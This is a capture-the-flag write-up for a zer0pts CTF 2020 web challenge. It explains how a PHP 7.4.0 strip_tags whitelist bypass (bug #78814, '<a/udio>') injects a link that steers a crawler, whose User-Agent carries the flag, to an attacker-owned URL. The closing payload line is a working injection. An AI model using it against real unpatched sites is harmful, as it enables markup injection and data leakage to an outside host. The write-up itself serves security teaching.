zer0pts CTF
, zer0pts CTF 2020
, web
We're given source codes for database, app, and crawler. The location of flag can easily be found in worker/worker.js
.
The flag is in User-Agent
header. This means that you can get the flag if the crawler accesses websites you own. But how?
Hack the URL where the crawler accesses? As you can see from new_post.php
, you can't.
XSS? As you can see from post.php
, it seems that you can't use HTML tags other than <audio>
.
But you can. As you can see from Dockerfile
in web
, the web server uses PHP 7.4.0. The latest version of PHP is now PHP 7.4.3, so it seems a bit old. Let's read changelog of 7.4.0 → 7.4.1.
- Standard:
- Fixed bug #78814 (strip_tags allows / in tag name => whitelist bypass).
This app uses strip_tags
for remove tags other than <audio>
. Let's dig the bug.
Bug #78814 strip_tags allows / in tag name, allowing whitelist bypass in browsers
When strip_tags is used with a whitelist of tags, php allows slashes ("/") that occur inside the name of a whitelisted tag and copies them to the result.
For example, if <strong> is whitelisted, then a tag <s/trong> is also kept.
This means that in the app's case, strip_tags
allows <a/udio>
, which is interpreted as <a>
.
So, with a payload like [["></audio><a/udio href="(URL)" id="like">test</a/udio><audio a="]]
, you can bring the crawler to any URL.